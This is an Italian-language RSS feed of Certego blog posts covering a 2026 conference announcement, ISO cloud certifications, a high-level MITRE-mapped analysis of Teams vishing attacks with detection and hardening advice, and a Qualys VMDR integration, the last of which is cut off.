<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Certego's RSS Feed]]></title><description><![CDATA[Managed Detection & Response services (MDR) 24/7 for network, endpoint, cloud, SaaS and OT, against every type of cyber attack]]></description><link>https://www.certego.net</link><generator>GatsbyJS</generator><lastBuildDate>Thu, 09 Apr 2026 13:43:34 GMT</lastBuildDate><item><title><![CDATA[PanoptiCON2026 - Fuoco invisibile: la difesa inizia da ciò che sai vedere]]></title><description><![CDATA[Il 4 giugno torna la cyber conference di Certego]]></description><link>https://www.certego.net/blog/panopticon2026-fuoco-invisibile-la-difesa-inizia-da-cio-che-sai-vedere-save-the-date-4-giugno/</link><guid isPermaLink="false">panopticon2026-fuoco-invisibile-la-difesa-inizia-da-cio-che-sai-vedere-save-the-date-4-giugno</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Tue, 31 Mar 2026 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;PanoptiCON, la cyber conference di Certego, torna anche nel 2026 con una nuova edizione, confermandosi come un appuntamento annuale dedicato a imprese, professionisti e decision maker che vogliono approfondire i temi più attuali della cybersecurity&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;L’edizione 2026 si terrà il &lt;strong&gt;4 giugno&lt;/strong&gt; nella cornice di &lt;strong&gt;Monteleone21 – Masi in Valpolicella(VR)&lt;/strong&gt;  e porterà al centro della riflessione un tema cruciale: la capacità di riconoscere in tempo i segnali deboli di un attacco prima che si trasformino in una crisi.&lt;/p&gt;
&lt;p&gt;Il titolo scelto per questa nuova edizione è “&lt;strong&gt;Fuoco Invisibile – La difesa inizia da ciò che sai vedere&lt;/strong&gt;”.
Gli attacchi informatici non arrivano mai davvero all’improvviso: iniziano come &lt;strong&gt;scintille nascoste&lt;/strong&gt;, segnali silenziosi e anomalie apparentemente marginali che spesso passano inosservati, fino a trasformarsi in &lt;strong&gt;incendi&lt;/strong&gt; capaci di compromettere processi, dati e continuità operativa. È proprio da questa immagine che prende forma il concept dell’evento: nella cybersecurity, vedere in anticipo ciò che brucia sotto la superficie significa poter intervenire prima che il danno diventi esteso e irreversibile.&lt;/p&gt;
&lt;p&gt;PanoptiCON2026 nasce da questa consapevolezza e propone una riflessione sulla sicurezza informatica non solo come insieme di tecnologie, ma come cultura, responsabilità e visione strategica. Attraverso &lt;strong&gt;interventi di esperti, casi reali, dimostrazioni e momenti di confronto&lt;/strong&gt;, l’evento esplorerà come rilevare, prevenire e gestire minacce che si muovono nell’ombra, offrendo alle aziende strumenti concreti — tecnici e umani — per proteggere il proprio futuro.&lt;/p&gt;
&lt;p&gt;PanoptiCON si conferma così un momento di incontro e approfondimento pensato per condividere esperienze, visioni e competenze, in un contesto che ogni anno riunisce la community della sicurezza informatica attorno ai temi più urgenti del settore.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Segna la data in agenda: 4 giugno 2026&lt;/strong&gt;.
Nelle prossime settimane condivideremo maggiori dettagli sul programma, ospiti, sponsor e modalità di partecipazione.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Certego rafforza il proprio impegno nella sicurezza Cloud con le certificazioni ISO 27017 e ISO 27018]]></title><link>https://www.certego.net/blog/certego-rafforza-impegno-nella-sicurezza-clouod-con-certificazioni-iso-27017-27018/</link><guid isPermaLink="false">certego-rafforza-impegno-nella-sicurezza-clouod-con-certificazioni-iso-27017-27018</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Sun, 22 Mar 2026 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Il conseguimento delle certificazioni ISO/IEC 27017 e ISO/IEC 27018 rappresenta un ulteriore passo nel percorso di evoluzione del Sistema di Gestione Integrato di Certego, già conforme agli standard ISO 9001 e ISO/IEC 27001, recentemente confermati a seguito degli audit di sorveglianza.&lt;/p&gt;
&lt;p&gt;In particolare, la certificazione ISO/IEC 27017 introduce controlli specifici per la &lt;strong&gt;sicurezza dei servizi Cloud&lt;/strong&gt;, mentre la ISO/IEC 27018 definisce linee guida per la &lt;strong&gt;protezione dei dati personali (PII) trattati in ambienti Cloud pubblici&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Questi riconoscimenti attestano la conformità della piattaforma proprietaria PanOptikon® e dei processi operativi aziendali ai più elevati standard internazionali in materia di sicurezza delle informazioni, governance e protezione dei dati&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;In un contesto normativo in continua evoluzione, caratterizzato da framework come la &lt;strong&gt;Direttiva NIS2&lt;/strong&gt; e il &lt;strong&gt;Regolamento DORA&lt;/strong&gt;, Certego conferma il proprio ruolo di partner affidabile per la protezione delle infrastrutture digitali, garantendo &lt;strong&gt;elevati livelli di trasparenza, controllo e resilienza&lt;/strong&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Dal Vishing al Domain Controller]]></title><description><![CDATA[Kill Chain completa di un attacco iniziato via Microsoft Teams]]></description><link>https://www.certego.net/blog/dal-vishing-al-domain-controller-kill-chain-di-un-attacco-iniziato-via-microsoft-teams/</link><guid isPermaLink="false">dal-vishing-al-domain-controller-kill-chain-di-un-attacco-iniziato-via-microsoft-teams</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Tue, 10 Mar 2026 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Nelle ultime settimane il nostro SecOps Team ha rilevato un incremento significativo di campagne di Vishing veicolate tramite Microsoft Teams&lt;/strong&gt;, in linea con quanto avevamo già evidenziato &lt;a href=&quot;https://www.certego.net/docs/Certego_Vishing_via_Microsoft_Teams.pdf&quot;&gt;in questo documento&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Non si tratta di semplice phishing adattato a un nuovo canale di comunicazione. Parliamo di attacchi strutturati, costruiti combinando:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ingegneria sociale&lt;/li&gt;
&lt;li&gt;abuso di configurazioni cloud permissive&lt;/li&gt;
&lt;li&gt;utilizzo di strumenti legittimi per l’accesso remoto&lt;/li&gt;
&lt;li&gt;escalation progressiva verso i sistemi core&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;L’obiettivo finale osservato è chiaro: &lt;strong&gt;ottenere il controllo delle macchine aziendali, fino al Domain Controller&lt;/strong&gt;, con il rischio concreto di compromissione dell’intera infrastruttura.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;Kill Chain dell’attacco tipico (MITRE ATT&amp;#x26;CK mapping)&lt;/h1&gt;
&lt;h2&gt;1. Initial Access – Valid Accounts &amp;#x26; Phishing (T1078 / T1566)&lt;/h2&gt;
&lt;p&gt;L’attacco inizia con una chiamata improvvisa su Teams.&lt;/p&gt;
&lt;p&gt;Gli attaccanti si presentano come personale IT e sfruttano una configurazione spesso lasciata invariata: &lt;strong&gt;Teams consente di default chiamate da utenti esterni&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Questa fase combina:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Phishing via servizio di comunicazione (T1566)&lt;/li&gt;
&lt;li&gt;Tentativi di raccolta credenziali → Valid Accounts (T1078)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;La leva dominante è l’urgenza: un presunto aggiornamento critico di sicurezza Windows che richiede un intervento immediato.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;2. Execution – Remote Services &amp;#x26; User Execution (T1021 / T1204)&lt;/h2&gt;
&lt;p&gt;Una volta ottenuta la fiducia dell’utente, l’attaccante guida l’interazione verso l’azione concreta: &lt;strong&gt;condivisione di credenziali, installazione di strumenti di accesso remoto o utilizzo di tool di Remote Support già presenti sull’host&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Qui osserviamo tipicamente:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;User Execution (T1204)&lt;/li&gt;
&lt;li&gt;Remote Services (T1021)&lt;/li&gt;
&lt;li&gt;In alcuni casi Command and Scripting Interpreter (T1059)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Non viene necessariamente distribuito malware custom. L’attacco si basa su &lt;strong&gt;Living-off-the-Land techniques (LOLBins)&lt;/strong&gt;, sfruttando strumenti legittimi già disponibili nell’ambiente. Questo riduce drasticamente gli indicatori tradizionali di compromissione.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/continuous-vulnerability-detection-qualys-vmdr-ora-nativo-in-panoptikon/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAACXklEQVR42n2S/UtTYRTHL0QUhZmaZSoWmorCkqD6DySCor+hIoheiIgQiv6MfgrJXyywTCMszKnrxW3p8iXv2pxuOrd5dzf3IrK3u9376dm1KIg68OWc5zzP833O95xHyhUKKGqMVCpFLBYjkUhQLBYxDMPE/8wwdJTNBMl0mi0BTdOQtnIFlsMKwdUA/kCAYHDNJPx9yfgLImvu6XqJWdnDd+8STqfDLEbStAJLXi9ekXS5XPh8ywI+3G43oVDon9UVBWdW3/GlMvnPZ6RsNsvLV0MMD79mcHAQ65iVZ/399Pb28nZkhEg4gtfjIeD34/ev4PF4kX1+5HCc6bUo9oDCdFBlYT1KLCska6KHs1OfcToc2KfsOGdcWCcmsdk+MD5hY8b1lU92B9bxSUbHxpmYcjDw3saoHGDUE+LNwgrv5FVG5n3IyTwSuRxZITUUjaFsZ/AXIFQwWM3pLGd01oUPauAT+mJC0sDHL1y42cOlG/e5eP0e567eofvKbc5fu0v35VtIZd1qvmRiXVwK5QyUvE5YEEXy5dhgIyf2tjWC4uzDx31IuyvZW1PPoeYOagSkfdXsqRbrlk6kcjPVZJpNNUo6sYmqbJCIx0WcQAmHiasqJTH1bCZjDuPR0xdItcepau6k0XLGxK7aJg4ca6ep6+wOoXstwvzcnBi/l/mFbywuysiym0hkAyWqkkylWQtF2BJne/qGkI60cbStgzrLaarbT1HZepKKFgsHT3SJHgrTSiXz7+m6bvpf+NNyxRJJ4R88eY60v5aqhnoa2jupa7VwWMiubGyloqGFH/OvlPT+SzMJAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/40a290cef9282b0c9d4b3a5670e59b84/71c1d/Certego%20qualys%20vulnerability.png&quot; srcset=&quot;/website/static/40a290cef9282b0c9d4b3a5670e59b84/804b2/Certego%20qualys%20vulnerability.png 384w,
/website/static/40a290cef9282b0c9d4b3a5670e59b84/e5715/Certego%20qualys%20vulnerability.png 768w,
/website/static/40a290cef9282b0c9d4b3a5670e59b84/71c1d/Certego%20qualys%20vulnerability.png 1536w,
/website/static/40a290cef9282b0c9d4b3a5670e59b84/cb93d/Certego%20qualys%20vulnerability.png 2304w,
/website/static/40a290cef9282b0c9d4b3a5670e59b84/1307b/Certego%20qualys%20vulnerability.png 3000w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
    &lt;br&gt;
&lt;br&gt;
&lt;h2&gt;3. Privilege Escalation &amp;#x26; Credential Access (T1068 / T1003)&lt;/h2&gt;
&lt;p&gt;Dopo l’accesso iniziale, l’obiettivo diventa l’espansione del controllo.&lt;/p&gt;
&lt;p&gt;Si osservano:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;raccolta di credenziali&lt;/li&gt;
&lt;li&gt;reset password sospetti&lt;/li&gt;
&lt;li&gt;modifiche agli account&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Le tecniche associate possono includere:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Credential Dumping (T1003)&lt;/li&gt;
&lt;li&gt;Exploitation for Privilege Escalation (T1068)&lt;/li&gt;
&lt;li&gt;Account Manipulation (T1098)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Il fine è &lt;strong&gt;ottenere privilegi amministrativi sufficienti per muoversi lateralmente all’interno dell’infrastruttura&lt;/strong&gt;.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;4. Lateral Movement &amp;#x26; Impact (T1486)&lt;/h2&gt;
&lt;p&gt;Una volta acquisiti privilegi adeguati, l’attacco entra nella fase più critica: accesso ai sistemi core, &lt;strong&gt;movimento verso Active Directory e tentativo di controllo del Domain Controller&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;In questa fase possono essere attivate:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Remote Services (T1021)&lt;/li&gt;
&lt;li&gt;Distribuzione di payload ransomware (T1486)&lt;/li&gt;
&lt;li&gt;Persistenza su identità privilegiate&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A questo punto l’&lt;strong&gt;incidente&lt;/strong&gt; non è più limitato a un singolo endpoint: &lt;strong&gt;diventa infrastrutturale&lt;/strong&gt;.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;Perché questo attacco elude molte difese&lt;/h1&gt;
&lt;p&gt;Questo tipo di compromissione è particolarmente insidiosa perché:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Utilizza un canale legittimo (Teams)&lt;/li&gt;
&lt;li&gt;Sfrutta configurazioni di default&lt;/li&gt;
&lt;li&gt;Impiega strumenti amministrativi leciti&lt;/li&gt;
&lt;li&gt;Non richiede exploit zero-day&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;È un attacco &lt;strong&gt;identity-driven&lt;/strong&gt;. Ed è proprio questa caratteristica a renderlo difficile da intercettare con controlli tradizionali basati su firme o IOC statici.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;MDR: cosa deve essere monitorato&lt;/h1&gt;
&lt;p&gt;Un MDR orientato alla detection engineering deve essere in grado di correlare eventi cloud, endpoint e identity in un’unica vista coerente.&lt;/p&gt;
&lt;h3&gt;1. Eventi anomali su Teams&lt;/h3&gt;
&lt;p&gt;Segnali rilevanti includono:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;chiamate provenienti da tenant sconosciuti&lt;/li&gt;
&lt;li&gt;tenant di prova o domini onmicrosoft.com&lt;/li&gt;
&lt;li&gt;pattern di contatto verso utenti non tecnici&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Questa visibilità richiede l’integrazione dei log Microsoft 365 nel SIEM e la capacità di analizzare i comportamenti nel tempo&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;2. Uso anomalo di strumenti di Remote Support&lt;/h3&gt;
&lt;p&gt;Gli attaccanti sfruttano tool già presenti sugli host, riducendo l’impatto delle soluzioni anti-malware tradizionali.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Un approccio detection-first efficace prevede:&lt;/li&gt;
&lt;li&gt;alert su esecuzione di tool di remote access fuori baseline&lt;/li&gt;
&lt;li&gt;correlazione tra chiamata Teams e avvio di una sessione remota&lt;/li&gt;
&lt;li&gt;monitoraggio dei privilegi temporanei concessi&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Il valore non è nel singolo alert, ma nella concatenazione logica degli eventi.&lt;/p&gt;
&lt;h3&gt;3. Identity &amp;#x26; Account Monitoring&lt;/h3&gt;
&lt;p&gt;Tra gli eventi da correlare:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;reset password non pianificati&lt;/li&gt;
&lt;li&gt;modifiche agli account&lt;/li&gt;
&lt;li&gt;cambi di configurazione sugli host&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ancora una volta, è la sequenza temporale a fare la differenza: singoli eventi possono sembrare legittimi; la loro combinazione racconta invece una storia diversa.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Hardening: misure concrete - Revisione delle chiamate esterne su Teams&lt;/h2&gt;
&lt;p&gt;Poiché Teams consente chiamate da utenti esterni di default, è fondamentale intervenire con:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;whitelist di tenant autorizzati&lt;/li&gt;
&lt;li&gt;policy restrittive per utenti non IT&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Blocco dei domini onmicrosoft.com&lt;/h2&gt;
&lt;p&gt;Gli attaccanti utilizzano frequentemente tenant di prova. Se non necessari, bloccare domini che terminano con onmicrosoft.com riduce significativamente la superficie di attacco.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/indicatori-di-compromissione-mdr/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAACgElEQVR42l2STUhUURTHX1BBbSrEsE+kDy2zJNT8aFpY2UwSBG5q16JlGAQm1M6gTSazEEkrVyFlIYRlMSQqgwk1WWmt0nHmvZl5M+Ok8/Hem8+aX/fNuOrBn3vOPZffPfd/nhTTDNLJJCndENLJppLkhAwzN5LoepJYQieTSjMrR3DMLZD/myedyRKLJ3B8dOH68g2ncwb3shfJFzV4LesFjcsak36dUa/OrKrzXtH5GjbIGQZks4z89FF6tpUbt++w6FEgD2ooQjC0wpLbQygcQVKjOhM+HYdirhofRDwu4hkBNOGukIFfnFkzMjybVyhpOM3GU60c7hnmsWMSTXRpfsl0Bt1IISlrRcCoR2PYrTGyrDEmun0l8hGPznORD/1K8DaQps8ls6G9g1L7C3Z33GKPpZ4rnTeZ+vSZvOjWtEHyiydPBAzUmEFC+GneYhhFD83YlLlPLsvLeZnNd/sp7+5lf2MdlbYLlNXXUVZbw7XOLpa8ClIkprMY0VgRazyuCaM14mII0VgxNmFxMZg/YnDTwoaS+3ZOtFlovnqZI1Yr5S3nKW9sQtq5iwePBpB+r0ZRBFnxBYRUZCUgpOKR/fj8QQJqmNVoAi0WJ5QBS1c3ZdUHOHjuDHtra6m4aOOo9RJbK6rpGRwygTGWxcSW3DL+QAiP11+AFeGqqPkKNVnAyeUYnPOyqaGFQ81NnGxvp6rNKoA2th2roXfgKdJqNL4OCBY68qshAsGVQmde0a1PXFLcD4vni/8xl6d3eoGq6x1st1nZYWlly/F6pH2V3LP3I5l+acIjU6Zf/8fmUMw1nlivCWguk2M+rPHE+R37m2n63jl5ODaF88ci/wBXaorq6SRhBAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/6435807a8cbc14655ff201e21e910106/71c1d/Certego%20ioc%20intelligence%20mdr.png&quot; srcset=&quot;/website/static/6435807a8cbc14655ff201e21e910106/804b2/Certego%20ioc%20intelligence%20mdr.png 384w,
/website/static/6435807a8cbc14655ff201e21e910106/e5715/Certego%20ioc%20intelligence%20mdr.png 768w,
/website/static/6435807a8cbc14655ff201e21e910106/71c1d/Certego%20ioc%20intelligence%20mdr.png 1536w,
/website/static/6435807a8cbc14655ff201e21e910106/01294/Certego%20ioc%20intelligence%20mdr.png 1615w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
    &lt;br&gt;
&lt;br&gt;
&lt;h1&gt;Detection-first vs Prevention-only&lt;/h1&gt;
&lt;p&gt;Questo caso dimostra un punto chiave: la prevenzione, da sola, non è sufficiente.&lt;/p&gt;
&lt;p&gt;Il controllo deve essere continuo e la correlazione cross-layer è determinante. Un servizio
MDR focalizzato su:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;telemetria estesa&lt;/li&gt;
&lt;li&gt;detection engineering&lt;/li&gt;
&lt;li&gt;risposta 24/7&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;può intercettare la kill chain nelle fasi iniziali, prima che il Domain Controller venga compromesso.
&lt;br&gt;
&lt;/br&gt;
&lt;br&gt;
&lt;/br&gt;
Il Vishing via Teams rappresenta l’evoluzione naturale delle tecniche di social engineering negli ambienti cloud collaborativi.&lt;/p&gt;
&lt;p&gt;Non è solo la sofisticazione della tecnica di attacco a fare la differenza, ma la capacità dell’organizzazione di:
rilevare comportamenti anomali
correlare segnali deboli
interrompere l’escalation prima che diventi sistemica&lt;/p&gt;
&lt;p&gt;Dal Vishing al Domain Controller, la distanza può essere poca… &lt;strong&gt;la differenza sta nella capacità di detection&lt;/strong&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Continuous Vulnerability Detection]]></title><description><![CDATA[ Qualys VMDR ora nativo in PanOptikon®]]></description><link>https://www.certego.net/blog/continuous-vulnerability-detection-qualys-vmdr-ora-nativo-in-panoptikon/</link><guid isPermaLink="false">continuous-vulnerability-detection-qualys-vmdr-ora-nativo-in-panoptikon</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Mon, 23 Feb 2026 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;La gestione delle vulnerabilità è oggi una leva strategica per ridurre il rischio e rafforzare la postura di sicurezza.
Quando il Vulnerability Management è integrato con le attività di Detection e Response, le informazioni sull’esposizione degli asset diventano parte attiva del processo operativo di sicurezza, contribuendo in modo concreto alla gestione del rischio.&lt;/p&gt;
&lt;p&gt;È in questa direzione che si inserisce l’&lt;strong&gt;integrazione nativa di Qualys VMDR in PanOptikon®, la Unified Security Operations Platform di Certego&lt;/strong&gt;.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;Una partnership consolidata, un’evoluzione naturale&lt;/h1&gt;
&lt;p&gt;La collaborazione tra Certego e Qualys è attiva da anni.
Le tecnologie Qualys rappresentano da tempo un elemento fondamentale per garantire ai nostri clienti visibilità sulle vulnerabilità e sull’esposizione dei propri asset.&lt;/p&gt;
&lt;p&gt;L’integrazione nativa in PanOptikon® rappresenta un passo evolutivo: non più uno strumento esterno collegato ai servizi, ma una componente pienamente integrata nella piattaforma e nel modello operativo MDR.&lt;/p&gt;
&lt;p&gt;Una scelta coerente con la nostra visione di sicurezza unificata.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;MDR e Vulnerability Management nello stesso ecosistema operativo&lt;/h1&gt;
&lt;p&gt;Con Qualys VMDR nativamente integrato in PanOptikon®, &lt;strong&gt;le vulnerabilità entrano nello stesso ambiente operativo in cui vengono erogati i servizi di Managed Detection and Response&lt;/strong&gt;.
Questo significa che:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;la visibilità sulle vulnerabilità è continua e direttamente disponibile in piattaforma&lt;/li&gt;
&lt;li&gt;l’esposizione degli asset è contestualizzata rispetto al rischio&lt;/li&gt;
&lt;li&gt;le informazioni diventano parte del contesto operativo della Detection e della Response&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;MDR e Vulnerability Management non sono più ambiti distinti, ma &lt;strong&gt;componenti integrate di un unico ecosistema operativo&lt;/strong&gt;, accessibile da una sola piattaforma e governato con una logica unificata, progettata per offrire una &lt;strong&gt;UX&lt;/strong&gt; chiara e coerente, in cui Detection, Response e Vulnerability Management convivono nello stesso contesto.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;Visibilità continua e prioritizzazione basata sul rischio&lt;/h1&gt;
&lt;p&gt;L’integrazione consente di monitorare in modo continuo il perimetro di scansione direttamente dalla piattaforma, ottenendo una visione aggiornata delle vulnerabilità e del livello di esposizione degli asset.&lt;/p&gt;
&lt;p&gt;All’interno di PanOptikon® è possibile:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Visualizzare il numero di vulnerabilità da correggere&lt;/li&gt;
&lt;li&gt;Analizzare le vulnerabilità per asset o per singola CVE&lt;/li&gt;
&lt;li&gt;Definire le priorità di intervento in base al rischio&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Il dato tecnico viene così trasformato in elemento decisionale&lt;/strong&gt;, supportando una gestione strutturata e consapevole delle attività di remediation.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h1&gt;Dall’analisi alla remediation&lt;/h1&gt;
&lt;p&gt;L’integrazione non si limita alla visibilità.
La piattaforma consente di approfondire il dettaglio delle CVE da correggere e pianificare in modo strutturato le attività di remediation, integrando la gestione delle patch nel processo complessivo di sicurezza.
Il risultato è una gestione delle vulnerabilità pienamente inserita nel ciclo operativo della sicurezza, non come funzione isolata ma come parte integrante del governo del rischio.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/indicatori-di-compromissione-mdr/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAAsTAAALEwEAmpwYAAACQElEQVR42k2QXUhTYRjHT5AQ3YTUMKxoSDXUMmLa0uaF1ZyNIKqLuuuiy5IITKKrPu7KMUIks7yqqBVCiCaWbGuEmGaoddU+zs57Pnb24c7H+7xnH6d2erer4OHhzx/+z/P8HkbFpGQYRSBFgIphmEWDUE0MIIaqQ7lYWuRy86sb1b/VUrmiavpcdGlp+Xs48iUWTzK8Qj5wQGuWwyERplKwKMEcgh8ZYhJiVSrBX7ztlOf68J0Yi6yqJcpZSc7SZFrOMpICCzzMI9rxZx5mEXyVICTAikwEBQqk/HIN7XSd3OryHBx5NfEphDXdsqxiqUKMEoMKtcAUi18ncDCJpzl4z+IgC2+SePK3PiOWRle4LZcGbYG3zTdu7XF3XR66Gf62XK1alIIRFLIgEkklOq7Dkhpz7QOkSB3LrLxb5xrujtnv+fe7Oh3e/t1dnU3OjqtDw/EUYnIqxHI4q4KmYVWjR4Gi1gRNamD8MYyIBLsePunw9fZcOe/weu19Z+wnuhlb86On40w+r6AUQryIeIlDIocklhN4IS1KmU1Fp2PksuW+fb+pvaXldO9ep/OQ72zrwLntjsOPn00y+U01waJ4ghNEmU0JNFmfIiVZnpqckLZMc2I11eDqO9DTfezihTaft7V/YEf7Uf/4C6agaDTA8Wm6TZBkMZ2lO1NI5EW57mR0DGWz6o9stF0bbPR6G92ebUeOM/scDwJjDIXEYNCikP8L+jDaNb1uYjDL5noGP4+uBWYiox+jI9Ph6M/YP/wBw36hrmUwAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/46535a5afe11acc5603a7bed72c75cae/71c1d/ioc%20certego.png&quot; srcset=&quot;/website/static/46535a5afe11acc5603a7bed72c75cae/804b2/ioc%20certego.png 384w,
/website/static/46535a5afe11acc5603a7bed72c75cae/e5715/ioc%20certego.png 768w,
/website/static/46535a5afe11acc5603a7bed72c75cae/71c1d/ioc%20certego.png 1536w,
/website/static/46535a5afe11acc5603a7bed72c75cae/01294/ioc%20certego.png 1615w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h1&gt;Il valore del SecOps Certego&lt;/h1&gt;
&lt;p&gt;Accanto all’integrazione tecnologica, il valore distintivo è rappresentato dal &lt;strong&gt;presidio del SecOps Team Certego&lt;/strong&gt;.&lt;/p&gt;
